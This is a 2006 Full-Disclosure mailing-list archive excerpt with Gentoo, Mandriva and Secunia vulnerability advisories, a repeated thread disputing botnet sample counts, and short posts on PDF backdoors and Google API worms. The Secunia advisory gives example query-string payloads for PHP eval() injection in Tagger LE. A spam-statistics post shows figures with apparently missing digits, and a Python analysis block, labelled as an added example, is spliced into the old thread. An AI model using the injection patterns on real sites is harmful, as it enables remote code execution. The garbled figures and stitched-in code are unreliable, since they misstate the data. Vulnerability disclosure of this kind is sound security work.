installation. Remove the directory if you don't use the scripts in
there.

Resolution
==

All DokuWiki users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=www-apps/dokuwiki-20060309d"

References
==

  [ 1 ] CVE-2006-4674
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4674
  [ 2 ] CVE-2006-4675
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4675
  [ 3 ] CVE-2006-4679
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4679

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200609-10.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5



Re: [Full-disclosure] the world of botnets article and wrong numbers

2006-09-14 Thread Toby McKay
On 9/14/06, 3APA3A <[EMAIL PROTECTED]> wrote:
> Dear Toby McKay,
>
> Number of 12000 is absolutely impossible. Actual number is much higher.

i agree it's impossible! but on samples (actual bot samples)! ip addresses
are a different ridiculous number gadi mentions. he said in the article there
is 3.5 MILLIONS unique ip addresses used every day in spam where does he come
with these ridiculous numbers?

he says 'spam alone'... saying there is much more ip for botnets not in spam.

> Let's look on daily statistics for messages rejected as SPAM on my mail
> system. Month statistics requires to much information to be processed,
> sorry.
>
> On August, 13 150419 messages from 24244 unique IPs
> On September, 12 160054 messages from 32882 unique IPs
> On September, 13 175573 messages from 35834 unique IPs
>
> New hosts between August, 13 and September, 13: 34952 (97%)
> New hosts between September, 12 and September, 13: 27988 (78%)
>
> In suggestion average lifetime of spamming IP is higher than 1 day, we
> can approximate number of spamming IPs on the whole net during one day
> as 15 with 40% rotation within 1 week. That is 24 new IPs every
> month. The problem is, most of these IPs are dynamic. So, we have to
> divide this number on average number of IPs infected host had during
> infection period. It's impossible to discover this number. My expert's
> mark is 3-5. That is, we have 5-8 new spamming bots every month
> with average life of 2 weeks. Looks reasonable, but again it's taken
> from nowhere. And we only counted bots used for spamming :)
>
> --
> Thursday, September 14, 2006, 3:05:42 PM, you wrote to full-disclosure@lists.grok.org.uk:
>
> TM> hi guys
> TM> i ask gadi on the botnets listserv on where he got the number 12K for bots
> TM> every month on his the world of botnets article [
> TM> http://www.beyondsecurity.com/whitepapers/SolomonEvronSept06.pdf] .. he gave
> TM> no real answer.
> TM> does that number sound right to anybody? where did you come up with it gadi?
>
> TM> ./mcktoby
>
> --
> ~/ZARAZA
> You know my name - look up my number (Beatles)


Re: [Full-disclosure] RSA SecurID SID800 Token vulnerable by design

2006-09-14 Thread Brian Eaton
Right.

Long-winded, but right.

Regards,
Brian



Re: [Full-disclosure] the world of botnets article and wrong numbers

2006-09-14 Thread Toby McKay
On 9/14/06, Gadi Evron <[EMAIL PROTECTED]> wrote:
> > hi guys
> > i ask gadi on the botnets listserv on where he got the number 12K for
> > bots every month on his the world of botnets article [
> > http://www.beyondsecurity.com/whitepapers/SolomonEvronSept06.pdf
>
> You did..
>
> > ] .. he gave no real answer.
> > does that number sound right to anybody? where did you come up with it
> > gadi?
>
> First, the link I prefer people use is the one on my blog at securiteam,
> as it holds the copyright notice for Virus Bulletin, under which I was
> allowed to host the article:
> http://blogs.securiteam.com/index.php/archives/593
>
> Numbers...
> I can't speak for others, but I can try to answer better than I did on the
> botnets mailing list on whitestar.
>
> On individual honey nets, even rather large ones, the number of unique
> samples often assembled can be somewhere between 200 and 800
> a month.. depending on how wide it is spread and the networks it sits
> on. Which is why many of us cooperate.
>
> From cumulative honey nets monitoring of such smaller (yet very
> effective) nets, and some larger nets, we get to a number of about 15K new
> bot samples every month (Alan Solomon and myself wrote 12K, so we
> underplayed it a bit due to statistics being a bit shaky). So the real avg
> number is somewhere around 15K new unique samples a month.
>
> Further, the anti virus world sees about the same numbers.
>
> The Microsoft anti malware team (and Ziv Mador specifically) spoke of 15K
> avg bot samples a month, as well.
>
> I don't know what others may be seeing, but this is our best estimate as
> to what's going on with the number of unique samples released every month.
>
> Jose Nazarijo from Arbor replied on the botnets list that he sees similar
> numbers.
>
> I hope this helps... what are you looking to hear?
>
> Gadi.

can you show samples for a month? can you show them as being real or in your
mind?

> >
> > ./mcktoby

[Full-disclosure] [ MDKSA-2006:164 ] - Updated xorg-x11/XFree86 packages fix integer overflow vulnerabilities

2006-09-14 Thread security

 ___
 
 Mandriva Linux Security Advisory MDKSA-2006:164
 http://www.mandriva.com/security/
 ___
 
 Package : xorg-x11
 Date: September 14, 2006
 Affected: 2006.0, Corporate 3.0
 ___
 
 Problem Description:
 
 Local exploitation of an integer overflow vulnerability in the
 'CIDAFM()' function in the X.Org and XFree86 X server could allow an
 attacker to execute arbitrary code with privileges of the X server,
 typically root (CVE-2006-3739).
 
 Local exploitation of an integer overflow vulnerability in the
 'scan_cidfont()' function in the X.Org and XFree86 X server could allow
 an attacker to execute arbitrary code with privileges of the X server,
 typically root (CVE-2006-3740).
 
 Updated packages are patched to address this issue.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3739
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3740
 ___
 
 Updated Packages:
 

Re: [Full-disclosure] the world of botnets article and wrong numbers

2006-09-14 Thread 3APA3A
Dear Toby McKay,

The number 12000 is absolutely impossible. The actual number is much higher.

Let's look at daily statistics for messages rejected as SPAM on my mail
system. Monthly statistics require too much information to be processed,
sorry.

On August 13: 150419 messages from 24244 unique IPs
On September 12: 160054 messages from 32882 unique IPs
On September 13: 175573 messages from 35834 unique IPs

New hosts between August 13 and September 13: 34952 (97%)
New hosts between September 12 and September 13: 27988 (78%)

Assuming the average lifetime of a spamming IP is higher than 1 day, we
can approximate the number of spamming IPs on the whole net during one day
as 15 with 40% rotation within 1 week. That is 24 new IPs every
month. The problem is, most of these IPs are dynamic. So we have to
divide this number by the average number of IPs an infected host had during
the infection period. It's impossible to discover this number. My expert's
mark is 3-5. That is, we have 5-8 new spamming bots every month
with an average life of 2 weeks. Looks reasonable, but again it's taken
from nowhere. And we only counted bots used for spamming :)

--Thursday, September 14, 2006, 3:05:42 PM, you wrote to 
full-disclosure@lists.grok.org.uk:

TM> hi guys
TM> i ask gadi on the botnets listserv on where he got the number 12K for bots
TM> every month on his the world of botnets article [
TM> http://www.beyondsecurity.com/whitepapers/SolomonEvronSept06.pdf] .. he gave
TM> no real answer.
TM> does that number sound right to anybody? where did you come up with it gadi?

TM> ./mcktoby


-- 
~/ZARAZA
You know my name - look up my number (Beatles)

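The daily-unique-IP and "new hosts (97%)" figures in the post above, and its spamming-bot extrapolation, computed from reject logs. This is an added example, not 3APA3A's own code; the log format ("<date> reject <client-ip>") is constructed for the example and is not any real MTA's output, and the extrapolation assumes a four-week month.

```python
"""Daily unique spam sources and day-to-day churn from mail reject logs.

Added example, not 3APA3A's own code.  Assumptions: the log format below
("<date> reject <client-ip>") is constructed for this example and is not
any real MTA's output; a month is taken as four weeks in the extrapolation.
"""
from collections import defaultdict

# Constructed sample of log lines covering two days; one accepted message is
# included to show that non-reject lines are ignored.
SAMPLE_LOG = """\
2006-09-12 reject 10.0.0.1
2006-09-12 reject 10.0.0.2
2006-09-12 reject 10.0.0.2
2006-09-12 reject 10.0.0.3
2006-09-13 reject 10.0.0.3
2006-09-13 reject 10.0.0.4
2006-09-13 reject 10.0.0.5
2006-09-13 reject 10.0.0.5
2006-09-13 reject 10.0.0.6
2006-09-13 accept 10.0.0.7
"""


def parse_rejects(log_text):
    """Return {date: (rejected_message_count, set_of_unique_client_ips)}.

    Lines that are not three whitespace-separated fields with 'reject' in
    the middle (accepted mail, malformed lines) are skipped.
    """
    counts = defaultdict(int)
    ips = defaultdict(set)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 3 or parts[1] != "reject":
            continue
        day, ip = parts[0], parts[2]
        counts[day] += 1
        ips[day].add(ip)
    return {day: (counts[day], ips[day]) for day in counts}


def new_hosts(stats, earlier, later):
    """IPs rejected on `later` that were never seen on `earlier`.

    Returns (count, share), where share is the fraction of `later`'s unique
    IPs that are new: the "New hosts ... (97%)" figure from the post.
    """
    earlier_ips = stats[earlier][1]
    later_ips = stats[later][1]
    fresh = later_ips - earlier_ips
    share = len(fresh) / len(later_ips) if later_ips else 0.0
    return len(fresh), share


def estimate_monthly_bots(daily_unique_ips, weekly_rotation, ips_per_bot,
                          weeks_per_month=4):
    """The post's extrapolation, parameterised.

    Daily unique IPs times the weekly rotation fraction gives new IPs per
    week; times weeks per month gives new IPs per month; dividing by the
    number of addresses one infected dynamic-IP host cycles through gives
    new spamming bots per month.  Every input is a guess the post itself
    calls "taken from nowhere", so treat the result as an order of magnitude.
    """
    if ips_per_bot <= 0:
        raise ValueError("ips_per_bot must be positive")
    new_ips_per_month = daily_unique_ips * weekly_rotation * weeks_per_month
    return new_ips_per_month / ips_per_bot


if __name__ == "__main__":
    stats = parse_rejects(SAMPLE_LOG)
    for day in sorted(stats):
        msgs, uniq = stats[day]
        print(f"On {day}: {msgs} messages from {len(uniq)} unique IPs")
    fresh, share = new_hosts(stats, "2006-09-12", "2006-09-13")
    print(f"New hosts between 2006-09-12 and 2006-09-13: {fresh} ({share:.0%})")
```

Run against real reject logs, the same two functions give the per-day and churn numbers the post reports; only the extrapolation step needs the guessed rotation and IPs-per-bot inputs.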


Re: [Full-disclosure] the world of botnets article and wrong numbers

2006-09-14 Thread Gadi Evron
> hi guys
> i ask gadi on the botnets listserv on where he got the number 12K for
> bots every month on his the world of botnets article [
> http://www.beyondsecurity.com/whitepapers/SolomonEvronSept06.pdf

You did..

> ] .. he gave no real answer.
> does that number sound right to anybody? where did you come up with it
> gadi?

First, the link I prefer people use is the one on my blog at securiteam,
as it holds the copyright notice for Virus Bulletin, under which I was
allowed to host the article:
http://blogs.securiteam.com/index.php/archives/593

Numbers...
I can't speak for others, but I can try to answer better than I did on the
botnets mailing list on whitestar.

On individual honey nets, even rather large ones, the number of unique
samples often assembled can be somewhere between 200 and 800
a month.. depending on how wide it is spread and the networks it sits
on. Which is why many of us cooperate.

From cumulative honey nets monitoring of such smaller (yet very
effective) nets, and some larger nets, we get to a number of about 15K new
bot samples every month (Alan Solomon and myself wrote 12K, so we
underplayed it a bit due to statistics being a bit shaky). So the real avg
number is somewhere around 15K new unique samples a month.

Further, the anti virus world sees about the same numbers.

The Microsoft anti malware team (and Ziv Mador specifically) spoke of 15K
avg bot samples a month, as well.

I don't know what others may be seeing, but this is our best estimate as
to what's going on with the number of unique samples released every month.

Jose Nazarijo from Arbor replied on the botnets list that he sees similar
numbers.

I hope this helps... what are you looking to hear?

Gadi.

> 
> ./mcktoby



Re: [Full-disclosure] Backdooring PDF Files

2006-09-14 Thread Dude VanWinkle
On 9/14/06, Geo. <[EMAIL PROTECTED]> wrote:
> > POC did nothing for my Foxit PDF reader. No www-page was opened and no
> > script was executed. Maybe you folks should just dump the clumsy and
> > insecure Acrobat Reader and move onto something better for reading .pdf
> > documents? ;)
>
> Good suggestion but foxit doesn't allow typing into pdf form fields.
>
> Geo. (I'd use it if it weren't for that shortcoming)


Have you tried GhostScript and GhostView?

http://www.cs.wisc.edu/~ghost/

-JP



[Full-disclosure] the world of botnets article and wrong numbers

2006-09-14 Thread Toby McKay
hi guys
i ask gadi on the botnets listserv on where he got the number 12K for bots
every month on his the world of botnets article [
http://www.beyondsecurity.com/whitepapers/SolomonEvronSept06.pdf
] .. he gave no real answer.
does that number sound right to anybody? where did you come up with it gadi?

./mcktoby

[Full-disclosure] Google Search API Worms

2006-09-14 Thread pdp (architect)
http://www.gnucitizen.org/blog/google-search-api-worms

The service that concerns me the most is Google AJAX Search API, the
new JavaScript powered search widget. In this article I cover the
potential problems with Google AJAX Search API and how it can be used
by web worms to propagate.

-- 
pdp (architect)
http://www.gnucitizen.org



Re: [Full-disclosure] Backdooring PDF Files

2006-09-14 Thread Geo.
> POC did nothing for my Foxit PDF reader. No www-page was opened and no 
> script was executed. Maybe you folks should just dump the clumsy and 
> insecure Acrobat Reader and move onto something better for reading .pdf 
> documents? ;)

Good suggestion but foxit doesn't allow typing into pdf form fields.

Geo. (I'd use it if it weren't for that shortcoming)



[Full-disclosure] Secunia Research: Tagger LE PHP "eval()" Injection Vulnerabilities

2006-09-14 Thread Secunia Research
==

 Secunia Research 14/09/2006

- Tagger LE PHP "eval()" Injection Vulnerabilities -

==
Table of Contents

Affected Software........................................................1
Severity.................................................................2
Vendor's Description of Software.........................................3
Description of Vulnerabilities...........................................4
Solution.................................................................5
Time Table...............................................................6
Credits..................................................................7
References...............................................................8
About Secunia............................................................9
Verification............................................................10

==
1) Affected Software

Tagger LE latest version (product has no version information).

Other versions may also be affected.

==
2) Severity

Rating: Highly critical
Impact: System Access
Where:  From Remote

==
3) Vendor's Description of Software

Tagger LE is a tagboard (mini message board) that will add visitor 
interactivity with your website and a form of communication to one 
and another. Tagger's many features include an Administration panel, 
IP Banning, Smart Auto Refresh, Smilies, Imposter prevention, and 
more. A perfect addition to a website lacking interactivity. This 
solution uses a Flat File Database (MySQL is not required).

Product link:
http://www.venturenine.com/

==
4) Description of Vulnerabilities

Secunia Research has discovered some vulnerabilities in Tagger LE, 
which can be exploited by malicious people to compromise a vulnerable 
system.

Input passed via the query string in tags.php, sign.php, and 
admin/index.php isn't properly sanitised before being used in an 
"eval()" call. This can be exploited to inject and execute arbitrary 
PHP code via a specially crafted parameter name or value.

Examples:
http://[host]/tags.php?foo=%22.[code].%22
http://[host]/sign.php?foo=%22.[code].%22
http://[host]/admin/index.php?foo=%22.[code].%22
http://[host]/taggerLE/tags.php?foo;[code];$foo=foo
http://[host]/taggerLE/sign.php?foo;[code];$foo=foo
http://[host]/admin/index.php?foo;[code];$foo=foo

==
5) Solution

Edit the source code to ensure that input is properly sanitised.

==
6) Time Table

30/08/2006 - Initial vendor notification.
13/09/2006 - Final reminder.
14/09/2006 - Public disclosure.

==
7) Credits

Discovered by Andreas Sandblad, Secunia Research.

==
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned 
CVE-2006-4437 for the vulnerabilities.

==
9) About Secunia

Secunia collects, validates, assesses, and writes advisories regarding
all the latest software vulnerabilities disclosed to the public. These
advisories are gathered in a publicly available database at the
Secunia website:

http://secunia.com/

Secunia offers services to our customers enabling them to receive all
relevant vulnerability information to their specific system
configuration.

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/secunia_security_advisories/

==
10) Verification

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2006-62/advisory/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==
